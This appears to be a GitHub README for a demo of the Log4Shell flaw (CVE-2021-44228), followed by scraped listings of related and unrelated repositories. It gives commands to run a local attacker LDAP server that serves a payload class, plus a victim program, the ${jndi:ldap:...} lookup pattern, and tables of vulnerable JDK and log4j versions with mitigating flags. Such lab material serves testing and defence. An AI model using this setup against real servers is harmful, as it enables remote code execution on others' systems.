sample-ldap-exploit

A short demo of CVE-2021-44228

Build

$ mvn clean verify

Run Attacker

$ java \
  -cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
  sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar

URLs:

http://localhost:8080/
http://localhost:8080/sample/payload/Payload.class

Run Victim

$ java \
  -cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
  sample.victim.Victim

Results

JDK / JRE

Version	Status
`Oracle JDK 8u5`	vulnerable
`OpenJDK 8u312`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)
`IBM OpenJDK 8u312-b07 (OpenJ9)`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)
`OpenJDK 11.0.7+10`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)
`OpenJDK 11.0.13+8`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)
`OpenJDK 16+36`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)
`OpenJDK 17+35`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)
`OpenJDK 17.0.1+12`	NOT vulnerable (unless `-Dcom.sun.jndi.ldap.object.trustURLCodebase=true`)

If NOT vulnerable, an instance of javax.naming.Reference is returned from javax.naming.Context.lookup().

If NOT vulnerable to loading classes from remote code bases, other Java deserialization vulnerabilities probably still exist!

log4j

Version	Status
`2.9.1`	vulnerable
`2.10.0`	vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`)
`2.14.1`	vulnerable (unless `-Dlog4j2.formatMsgNoLookups=true` or environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`)
`2.15.0`	NOT vulnerable

If NOT vulnerable, ${jndi:ldap:...} is NOT resolved.

This project will help to test the Log4j CVE-2021-44228 vulnerability.

Log4j-JNDIServer This project will help to test the Log4j CVE-2021-44228/CVE-2021-45046 vulnerabilities. Installation and Building Load the project on

Jun 30, 2022

Spring Boot Log4j - CVE-2021-44228 Docker Lab

Spring Boot Log4j - CVE-2021-44228 The Log4Shell vulnerability (CVE-2021-44228) ultimately is a quite simple JNDI Injection flaw, but in a really real

Jun 10, 2022

Spring Boot web application vulnerable to CVE-2021-44228, nicknamed Log4Shell.

Log4Shell sample vulnerable application (CVE-2021-44228) This repository contains a Spring Boot web application vulnerable to CVE-2021-44228, nickname

Jan 5, 2023

Vulnerability CVE-2021-44228 checker

CVE-2021-44228 checker This is the repository for checking for vulnerability CVE-2021-44228. This is a PoC that only displays strings without any exte

Nov 9, 2022

Deploys an agent to fix CVE-2021-44228 (Log4j RCE vulnerability) in a running JVM process

-- This repository has been archived -- Further development of this tool will continue at corretto/hotpatch-for-apache-log4j2. Thanks for sharing, com

Dec 23, 2021

Log4j-RCE (CVE-2021-44228) Proof of Concept with additional information

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228) This is a proof of concept of the log4j rce. Here are some links for the CVE-2021-44228: https://www.lunas

Dec 2, 2022

An agent to hotpatch the log4j RCE from CVE-2021-44228.

Log4jHotPatch This is a tool which injects a Java agent into a running JVM process. The agent will attempt to patch the lookup() method of all loaded

Dec 13, 2022

My first proper GitHub project, I guess. Basically an automated version of the "Battle Royale" short series on Geo Facts' YouTube channel.

State-Royale Made by Pixer415, with some help from ThatOneCalculator This project needs your contributions. New modes/new features/typo fixes/suggesti

Jun 27, 2022

Short Java programs for practice (OCP) Oracle Certified Professional Java SE 11

OCP-study Short Java programs to practice for (OCP) Oracle Certified Professional Java SE 11 Exam Google document with notes: https://docs.google.com/

May 24, 2022